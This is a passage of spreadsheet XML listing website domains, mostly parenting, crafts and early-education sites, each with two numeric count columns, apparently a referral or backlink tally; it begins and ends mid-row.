      <x:c r="C56" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="57">
      <x:c r="A57" s="86" t="str">
        <x:v>https://happytotshelf.com</x:v>
      </x:c>
      <x:c r="B57" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C57" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="58">
      <x:c r="A58" s="86" t="str">
        <x:v>https://bajadad.com</x:v>
      </x:c>
      <x:c r="B58" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C58" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="59">
      <x:c r="A59" s="86" t="str">
        <x:v>https://cms-web.org</x:v>
      </x:c>
      <x:c r="B59" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C59" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="60">
      <x:c r="A60" s="86" t="str">
        <x:v>https://mamaloveslittles.com</x:v>
      </x:c>
      <x:c r="B60" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C60" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="61">
      <x:c r="A61" s="86" t="str">
        <x:v>https://careforkids.com.au</x:v>
      </x:c>
      <x:c r="B61" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C61" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="62">
      <x:c r="A62" s="86" t="str">
        <x:v>https://teachertypes.com</x:v>
      </x:c>
      <x:c r="B62" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C62" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="63">
      <x:c r="A63" s="86" t="str">
        <x:v>https://defeat-dyslexia.com</x:v>
      </x:c>
      <x:c r="B63" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C63" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="64">
      <x:c r="A64" s="86" t="str">
        <x:v>https://diypartymom.com</x:v>
      </x:c>
      <x:c r="B64" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C64" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="65">
      <x:c r="A65" s="86" t="str">
        <x:v>https://domain.glass</x:v>
      </x:c>
      <x:c r="B65" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C65" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="66">
      <x:c r="A66" s="86" t="str">
        <x:v>https://thecottagemarket.com</x:v>
      </x:c>
      <x:c r="B66" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C66" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="67">
      <x:c r="A67" s="86" t="str">
        <x:v>https://inspirekidsmontessori.com</x:v>
      </x:c>
      <x:c r="B67" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C67" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="68">
      <x:c r="A68" s="86" t="str">
        <x:v>https://imamother.com</x:v>
      </x:c>
      <x:c r="B68" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C68" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="69">
      <x:c r="A69" s="86" t="str">
        <x:v>https://craftsyhacks.com</x:v>
      </x:c>
      <x:c r="B69" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="C69" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="70">
      <x:c r="A70" s="86" t="str">
        <x:v>https://myquickfit.net</x:v>
      </x:c>
      <x:c r="B70" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C70" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="71">
      <x:c r="A71" s="86" t="str">
        <x:v>https://motheroohq.com</x:v>
      </x:c>
      <x:c r="B71" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C71" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="72">
      <x:c r="A72" s="86" t="str">
        <x:v>https://kidactivitieswithalexa.com</x:v>
      </x:c>
      <x:c r="B72" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C72" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="73">
      <x:c r="A73" s="86" t="str">
        <x:v>https://alisonlouisebellbooks.com</x:v>
      </x:c>
      <x:c r="B73" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C73" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="74">
      <x:c r="A74" s="86" t="str">
        <x:v>https://haleywynndesigns.com</x:v>
      </x:c>
      <x:c r="B74" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C74" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="75">
      <x:c r="A75" s="86" t="str">
        <x:v>https://chinatigoo.com</x:v>
      </x:c>
      <x:c r="B75" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C75" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="76">
      <x:c r="A76" s="86" t="str">
        <x:v>https://ourlittleplaynest.com</x:v>
      </x:c>
      <x:c r="B76" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C76" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="77">
      <x:c r="A77" s="86" t="str">
        <x:v>https://onefestivemama.com</x:v>
      </x:c>
      <x:c r="B77" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C77" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="78">
      <x:c r="A78" s="86" t="str">
        <x:v>https://linkreducation.com</x:v>
      </x:c>
      <x:c r="B78" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C78" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="79">
      <x:c r="A79" s="86" t="str">
        <x:v>https://gayweddingsmag.com</x:v>
      </x:c>
      <x:c r="B79" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C79" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="80">
      <x:c r="A80" s="86" t="str">
        <x:v>https://montessoriintown.com</x:v>
      </x:c>
      <x:c r="B80" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C80" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="81">
      <x:c r="A81" s="86" t="str">
        <x:v>https://45.11.3.231:443</x:v>
      </x:c>
      <x:c r="B81" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C81" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="82">
      <x:c r="A82" s="86" t="str">
        <x:v>https://familyfelicity.com</x:v>
      </x:c>
      <x:c r="B82" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C82" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="83">
      <x:c r="A83" s="86" t="str">
        <x:v>https://thesltscrapbook.com</x:v>
      </x:c>
      <x:c r="B83" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C83" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="84">
      <x:c r="A84" s="86" t="str">
        <x:v>https://azurefd.net</x:v>
      </x:c>
      <x:c r="B84" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C84" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="85">
      <x:c r="A85" s="86" t="str">
        <x:v>https://cnreproductive.com</x:v>
      </x:c>
      <x:c r="B85" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C85" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="86">
      <x:c r="A86" s="86" t="str">
        <x:v>https://myboredtoddler.com</x:v>
      </x:c>
      <x:c r="B86" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C86" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="87">
      <x:c r="A87" s="86" t="str">
        <x:v>https://leday.cn</x:v>
      </x:c>
      <x:c r="B87" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C87" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="88">
      <x:c r="A88" s="86" t="str">
        <x:v>https://roseclearfield.com</x:v>
      </x:c>
      <x:c r="B88" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C88" s="86" t="str">
        <x:v>86</x:v>
      </x:c>
    </x:row>
    <x:row r="89">
      <x:c r="A89" s="86" t="str">
        <x:v>https://whitehacker.cn</x:v>
      </x:c>
      <x:c r="B89" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C89" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="90">
      <x:c r="A90" s="86" t="str">
        <x:v>https://dalianlaowu.com</x:v>
      </x:c>
      <x:c r="B90" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C90" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="91">
      <x:c r="A91" s="86" t="str">
        <x:v>https://ffdc.com.au</x:v>
      </x:c>
      <x:c r="B91" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C91" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="92">
      <x:c r="A92" s="86" t="str">
        <x:v>https://mommybabyplay.com</x:v>
      </x:c>
      <x:c r="B92" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C92" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="93">
      <x:c r="A93" s="86" t="str">
        <x:v>https://rhythmsofplay.com</x:v>
      </x:c>
      <x:c r="B93" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C93" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="94">
      <x:c r="A94" s="86" t="str">
        <x:v>https://lizzyhannaford.com.au</x:v>
      </x:c>
      <x:c r="B94" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C94" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="95">
      <x:c r="A95" s="86" t="str">
        <x:v>https://pevanandsarah.com</x:v>
      </x:c>
      <x:c r="B95" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C95" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="96">
      <x:c r="A96" s="86" t="str">
        <x:v>https://sticksandstoneseducation.com.au</x:v>
      </x:c>
      <x:c r="B96" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C96" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="97">
      <x:c r="A97" s="86" t="str">
        <x:v>https://skillshoster.com</x:v>
      </x:c>
      <x:c r="B97" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C97" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="98">
      <x:c r="A98" s="86" t="str">
        <x:v>https://mrspriestleyict.com</x:v>
      </x:c>
      <x:c r="B98" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C98" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="99">
      <x:c r="A99" s="86" t="str">
        <x:v>https://gogonow.de</x:v>
      </x:c>
      <x:c r="B99" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C99" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="100">
      <x:c r="A100" s="86" t="str">
        <x:v>https://ciba.cl</x:v>
      </x:c>
      <x:c r="B100" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C100" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="101">
      <x:c r="A101" s="86" t="str">
        <x:v>https://motheroomontessori.com</x:v>
      </x:c>
      <x:c r="B101" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C101" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="102">
      <x:c r="A102" s="86" t="str">
        <x:v>https://goodreads.com</x:v>
      </x:c>
      <x:c r="B102" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C102" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="103">
      <x:c r="A103" s="86" t="str">
        <x:v>https://qualitycareforchildren.org</x:v>
      </x:c>
      <x:c r="B103" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C103" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="104">
      <x:c r="A104" s="86" t="str">
        <x:v>https://happinessishomemade.net</x:v>
      </x:c>
      <x:c r="B104" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C104" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="105">
      <x:c r="A105" s="86" t="str">
        <x:v>https://playvolutionhq.com</x:v>
      </x:c>
      <x:c r="B105" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C105" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="106">
      <x:c r="A106" s="86" t="str">
        <x:v>https://celebrateplay.com.au</x:v>
      </x:c>
      <x:c r="B106" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C106" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="107">
      <x:c r="A107" s="86" t="str">
        <x:v>https://copymethat.com</x:v>
      </x:c>
      <x:c r="B107" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C107" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="108">
      <x:c r="A108" s="86" t="str">
        <x:v>https://cakebaking.net</x:v>
      </x:c>
      <x:c r="B108" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C108" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="109">
      <x:c r="A109" s="86" t="str">
        <x:v>https://gatanippo.com</x:v>
      </x:c>
      <x:c r="B109" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C109" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="110">
      <x:c r="A110" s="86" t="str">
        <x:v>https://classichomeimprovements.ca</x:v>
      </x:c>
      <x:c r="B110" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C110" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="111">
      <x:c r="A111" s="86" t="str">
        <x:v>https://richlandlibrary.com</x:v>
      </x:c>
      <x:c r="B111" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C111" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="112">
      <x:c r="A112" s="86" t="str">
        <x:v>https://transparenciaypoder.mx</x:v>
      </x:c>
      <x:c r="B112" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C112" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="113">
      <x:c r="A113" s="86" t="str">
        <x:v>https://barleyandbirch.com</x:v>
      </x:c>
      <x:c r="B113" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C113" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="114">
      <x:c r="A114" s="86" t="str">
        <x:v>https://cmadocs.org</x:v>
      </x:c>
      <x:c r="B114" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C114" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="115">
      <x:c r="A115" s="86" t="str">
        <x:v>https://activitiesforfamilies.com</x:v>
      </x:c>
      <x:c r="B115" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C115" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="116">
      <x:c r="A116" s="86" t="str">
        <x:v>https://rhiwbeinaprm.co.uk</x:v>
      </x:c>
      <x:c r="B116" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C116" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="117">
      <x:c r="A117" s="86" t="str">
        <x:v>https://maxlinen.com.au</x:v>
      </x:c>
      <x:c r="B117" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="C117" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="118">
      <x:c r="A118" s="86" t="str">
        <x:v>https://mamaofmanyblessings.com</x:v>
      </x:c>
      <x:c r="B118" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C118" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="119">
      <x:c r="A119" s="86" t="str">
        <x:v>https://educationcorner.com</x:v>
      </x:c>
      <x:c r="B119" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C119" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="120">
      <x:c r="A120" s="86" t="str">
        <x:v>https://diyblissful.com</x:v>
      </x:c>
      <x:c r="B120" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C120" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="121">
      <x:c r="A121" s="86" t="str">
        <x:v>https://ibelieve.com</x:v>
      </x:c>
      <x:c r="B121" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C121" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="122">
      <x:c r="A122" s="86" t="str">
        <x:v>https://peoriaplayhouse.org</x:v>
      </x:c>
      <x:c r="B122" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C122" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="123">
      <x:c r="A123" s="86" t="str">
        <x:v>https://moojeegae.com</x:v>
      </x:c>
      <x:c r="B123" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C123" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="124">
      <x:c r="A124" s="86" t="str">
        <x:v>https://joyfulbunny.com</x:v>
      </x:c>
      <x:c r="B124" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C124" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="125">
      <x:c r="A125" s="86" t="str">
        <x:v>https://twinkl.com.br</x:v>
      </x:c>
      <x:c r="B125" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C125" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="126">
      <x:c r="A126" s="86" t="str">
        <x:v>https://ibjcn.com</x:v>
      </x:c>
      <x:c r="B126" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C126" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="127">
      <x:c r="A127" s="86" t="str">
        <x:v>https://everblocksystems.com</x:v>
      </x:c>
      <x:c r="B127" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C127" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="128">
      <x:c r="A128" s="86" t="str">
        <x:v>https://twinkl.com.tw</x:v>
      </x:c>
      <x:c r="B128" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C128" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="129">
      <x:c r="A129" s="86" t="str">
        <x:v>https://twinkl.nl</x:v>
      </x:c>
      <x:c r="B129" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C129" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="130">
      <x:c r="A130" s="86" t="str">
        <x:v>https://twinkl.fi</x:v>
      </x:c>
      <x:c r="B130" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C130" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="131">
      <x:c r="A131" s="86" t="str">
        <x:v>https://linkedin.com</x:v>
      </x:c>
      <x:c r="B131" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C131" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="132">
      <x:c r="A132" s="86" t="str">
        <x:v>https://yedi24online.net</x:v>
      </x:c>
      <x:c r="B132" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C132" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="133">
      <x:c r="A133" s="86" t="str">
        <x:v>https://thewordcolumbus.com</x:v>
      </x:c>
      <x:c r="B133" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C133" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="134">
      <x:c r="A134" s="86" t="str">
        <x:v>https://kpdq.com</x:v>
      </x:c>
      <x:c r="B134" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C134" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="135">
      <x:c r="A135" s="86" t="str">
        <x:v>https://veritas.es</x:v>
      </x:c>
      <x:c r="B135" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C135" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="136">
      <x:c r="A136" s="86" t="str">
        <x:v>https://gwhs1955.org</x:v>
      </x:c>
      <x:c r="B136" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C136" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="137">
      <x:c r="A137" s="86" t="str">
        <x:v>https://la-traccia.com</x:v>
      </x:c>
      <x:c r="B137" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C137" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="138">
      <x:c r="A138" s="86" t="str">
        <x:v>https://creativesjoy.com</x:v>
      </x:c>
      <x:c r="B138" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C138" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="139">
      <x:c r="A139" s="86" t="str">
        <x:v>https://siterubix.com</x:v>
      </x:c>
      <x:c r="B139" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C139" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="140">
      <x:c r="A140" s="86" t="str">
        <x:v>https://smefundinghub.com</x:v>
      </x:c>
      <x:c r="B140" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C140" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="141">
      <x:c r="A141" s="86" t="str">
        <x:v>https://swtafe.edu.au</x:v>
      </x:c>
      <x:c r="B141" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C141" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="142">
      <x:c r="A142" s="86" t="str">
        <x:v>https://fennies.com</x:v>
      </x:c>
      <x:c r="B142" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C142" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="143">
      <x:c r="A143" s="86" t="str">
        <x:v>https://babydevotions.com</x:v>
      </x:c>
      <x:c r="B143" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C143" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="144">
      <x:c r="A144" s="86" t="str">
        <x:v>https://familyfunandbeyond.com</x:v>
      </x:c>
      <x:c r="B144" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C144" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="145">
      <x:c r="A145" s="86" t="str">
        <x:v>https://positivebloom.com</x:v>
      </x:c>
      <x:c r="B145" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C145" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="146">
      <x:c r="A146" s="86" t="str">
        <x:v>https://twinkl.it</x:v>
      </x:c>
      <x:c r="B146" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C146" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="147">
      <x:c r="A147" s="86" t="str">
        <x:v>https://ozaukeefamilyservices.org</x:v>
      </x:c>
      <x:c r="B147" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C147" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="148">
      <x:c r="A148" s="86" t="str">
        <x:v>https://theyouthdesk.com</x:v>
      </x:c>
      <x:c r="B148" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C148" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="149">
      <x:c r="A149" s="86" t="str">
        <x:v>https://rachelreiter.com</x:v>
      </x:c>
      <x:c r="B149" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C149" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="150">
      <x:c r="A150" s="86" t="str">
        <x:v>https://am1280thepatriot.com</x:v>
      </x:c>
      <x:c r="B150" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C150" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="151">
      <x:c r="A151" s="86" t="str">
        <x:v>https://twinkl.com.co</x:v>
      </x:c>
      <x:c r="B151" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C151" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="152">
      <x:c r="A152" s="86" t="str">
        <x:v>https://entertainyourtoddler.com</x:v>
      </x:c>
      <x:c r="B152" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C152" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="153">
      <x:c r="A153" s="86" t="str">
        <x:v>https://searchingandshopping.com</x:v>
      </x:c>
      <x:c r="B153" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C153" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="154">
      <x:c r="A154" s="86" t="str">
        <x:v>https://siurypulgar.com</x:v>
      </x:c>
      <x:c r="B154" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C154" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="155">
      <x:c r="A155" s="86" t="str">
        <x:v>https://kindnessandgenerosity.com</x:v>
      </x:c>
      <x:c r="B155" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C155" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="156">
      <x:c r="A156" s="86" t="str">
        <x:v>https://decoda.ca</x:v>
      </x:c>
      <x:c r="B156" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C156" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="157">
      <x:c r="A157" s="86" t="str">
        <x:v>https://home.blog</x:v>
      </x:c>
      <x:c r="B157" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C157" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="158">
      <x:c r="A158" s="86" t="str">
        <x:v>https://twinkl.com.bh</x:v>
      </x:c>
      <x:c r="B158" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C158" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="159">
      <x:c r="A159" s="86" t="str">
        <x:v>https://chasinghiddenworlds.com</x:v>
      </x:c>
      <x:c r="B159" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C159" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="160">
      <x:c r="A160" s="86" t="str">
        <x:v>https://feraandsisters.com</x:v>
      </x:c>
      <x:c r="B160" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C160" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="161">
      <x:c r="A161" s="86" t="str">
